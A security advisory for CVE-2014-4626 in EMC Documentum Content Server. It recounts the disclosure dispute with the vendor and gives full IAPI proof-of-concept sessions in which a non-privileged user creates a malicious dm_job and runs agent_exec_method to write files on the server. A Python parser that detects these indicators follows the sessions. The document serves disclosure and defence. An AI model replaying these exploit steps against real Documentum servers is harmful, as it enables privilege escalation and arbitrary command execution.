
Extra information for CVE-2014-4626 - EMC Documentum Content Server: authenticated user is able to elevate privileges, hijack Content Server filesystem, execute arbitrary commands by creating malicious dm_job objects

Published: 2015-07-05 00:00:00 (vulners.com)

Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed

In April 2014 I discovered a vulnerability in EMC Documentum Content Server
which allows an authenticated user to elevate privileges, hijack the Content
Server filesystem or execute arbitrary commands by creating malicious dm_job
objects (for a detailed description see VRF#HUFU6FNP.txt and VRF#HUFV0UZN.txt).

In October 2014 the vendor announced ESA-2014-105, which claimed that the
vulnerability had been remediated.

In November 2014 the fix was contested (there was a significant delay after
ESA-2014-105 because the vendor constantly fails to provide the status of
reported vulnerabilities) by providing a PoC similar to the one described in
VRF#HUGC34JH.txt. The description provided to CERT/CC (another CNA was chosen
because the vendor fails to communicate) was:
=================================8<================================
The problem is that a non-privileged user is able to create dm_job objects and
execute the corresponding docbase methods (some examples of "malicious" methods
are given in VRF#HUFU6FNP, also see VRF#HUFV0UZN); the word "create" here
means any sequence of commands which results in the existence of a dm_job
object. The PoC in VRF#HUFU6FNP describes an attack on the scheduler: the
scheduler does not schedule jobs unless they are owned by a superuser, so the
command sequence in that case was "create dm_job and update dm_job". EMC thinks
that they have fixed the vulnerability, but they just fixed the sequence given
in the PoC; another sequence is "create dm_sysobject, update dm_sysobject &
change dm_sysobject" (see VRF#HUGC34JH, it's an already known attack).
Also, I could provide a third PoC related to this report, but I do not think
that would be useful for EMC.
=================================>8================================

The current status of CVE-2014-4626 is obscure; the last public status can be
found in the CERT/CC spreadsheet (http://www.kb.cert.org/vuls/id/315340):
=================================8<================================
The new exploit is being tracked under PSRC-2494.
This is targeted for Q1 2015 (March patch).
=================================>8================================

Though the latest builds of EMC Documentum Content Server successfully pass the
PoCs described previously:
=================================8<================================
API> create,c,dm_job

08024be980006902
API> set,c,l,owner_name
SET> dmadmin

OK
API> set,c,l,world_permit
SET> 7

OK
API> save,c,l

[DM_SYSOBJECT_E_CANT_CHANGE_OWNER_NAME]error:
"Must have system admin privileges or superuser privileges
to change the owner_name to 'dmadmin'."

API> create,c,dm_sysobject

08024be980006904
API> set,c,l,owner_name
SET> dmadmin

OK
API> set,c,l,world_permit
SET> 7

OK
API> save,c,l

OK
API> ?,c,change dm_sysobject object to dm_job
where r_object_id='08024be980006904'
[DM_QUERY_F_CHANGE_SAVE]fatal: "CHANGE: An unexpected save
error has occurred for object 08024be980006904."

[DM_USER_E_NEED_SU_OR_SYS_FOR_OBJECT_CHANGE]error:
"The current user (test) needs to have superuser or sysadmin
privilege to create or save or destroy objects of type (dm_job)."
=================================>8================================

the vulnerability remains unfixed. Below is another PoC (the job engine in
Documentum consists of two parts, a scheduler and an executor; the previous
attacks were designed to exploit the vulnerability in the scheduler, this one
demonstrates how to exploit the vulnerability in the job executor):
=================================8<================================
API> create,c,dm_job

08024be98000690e
API> set,c,l,object_name
SET> malicious job

OK
API> set,c,l,inactivate_after_failure
SET> 0

OK
API> set,c,l,max_iterations
SET> 0

OK
API> set,c,l,method_name
SET> dm_file_writer

OK
API> set,c,l,pass_standard_arguments
SET> 0

OK
API> set,c,l,run_interval
SET> 1

OK
API> set,c,l,run_mode
SET> 1

OK
API> set,c,l,run_now
SET> 1

OK
API> set,c,l,is_inactive
SET> 0

OK
API> set,c,l,world_permit
SET> 7

OK
API> append,c,l,method_arguments
SET> /tmp/test.txt

OK
API> append,c,l,method_arguments
SET> agentexec_has_vulnerability

OK
API> append,c,l,method_arguments
SET> CREATE

OK
API> save,c,l

OK
API> apply,c,DO_METHOD,METHOD,S,agent_exec_method,
ARGUMENTS,S,'
-docbase_name DCTM_DEV.DCTM_DEV
-docbase_owner dmadmin
-job_id 08024be98000690e
-log_directory /u01/documentum/cs/dba/log
-docbase_id 150505
-trace_level 10
'

q0
API> next,c,q0

OK
API> dump,c,q0

USER ATTRIBUTES

result : 0
process_id : 91436
launch_failed : F
method_return_val : 0
os_system_error : No Error
timed_out : F
time_out_length : 60
app_server_host_name :
app_server_port : 0
app_server_uri :
error_message :

SYSTEM ATTRIBUTES

APPLICATION ATTRIBUTES

INTERNAL ATTRIBUTES

API> Bye
~]$ cat /tmp/test.txt
agentexec_has_vulnerability
=================================>8================================
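As an added defender-side example (not part of this advisory or of Documentum): a small Python parser that replays an IAPI transcript in the format shown above, reconstructs the attributes set on each created object, and flags the indicators a reviewer would want to see on a dm_job (world_permit 7, i.e. Delete for everyone; method_arguments naming a server filesystem path; a direct DO_METHOD call of agent_exec_method for that job). The transcript is constructed, with the apply command collapsed onto one line, and the indicator choices are my assumptions.

```python
import re

# Constructed IAPI transcript in the advisory's format (not captured from a live system).
SAMPLE_SESSION = """\
API> create,c,dm_job
08024be98000690e
API> set,c,l,world_permit
SET> 7
OK
API> append,c,l,method_arguments
SET> /tmp/test.txt
OK
API> apply,c,DO_METHOD,METHOD,S,agent_exec_method,ARGUMENTS,S,'-job_id 08024be98000690e'
q0
"""

def parse_session(text):
    """Replay create/set/append/apply lines into {object_id: {type, attrs, applied}}."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    objects, current = {}, None
    for i, line in enumerate(lines):
        fields = line.split(",")
        if line.startswith("API> create,"):
            current = lines[i + 1]  # IAPI echoes the new object id on the next line
            objects[current] = {"type": fields[2], "attrs": {}, "applied": False}
        elif line.startswith(("API> set,", "API> append,")) and current:
            value = lines[i + 1].removeprefix("SET> ")
            attrs = objects[current]["attrs"]
            if fields[0].endswith("append"):  # repeating attribute: keep every value
                attrs.setdefault(fields[3], []).append(value)
            else:
                attrs[fields[3]] = value
        elif "DO_METHOD" in line and "agent_exec_method" in line:
            m = re.search(r"-job_id\s+([0-9a-f]{16})", line)
            if m and m.group(1) in objects:
                objects[m.group(1)]["applied"] = True
    return objects

def flag_jobs(objects):
    findings = []  # (object_id, reason) pairs for dm_job objects only
    for oid, obj in objects.items():
        if obj["type"] != "dm_job":
            continue
        if obj["attrs"].get("world_permit") == "7":
            findings.append((oid, "world_permit=7: any docbase user may modify the job"))
        if any(arg.startswith("/") for arg in obj["attrs"].get("method_arguments", [])):
            findings.append((oid, "method_arguments name a Content Server filesystem path"))
        if obj["applied"]:
            findings.append((oid, "agent_exec_method invoked directly via DO_METHOD for this job"))
    return findings
```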

--
Regards,
Andrey B. Panfilov
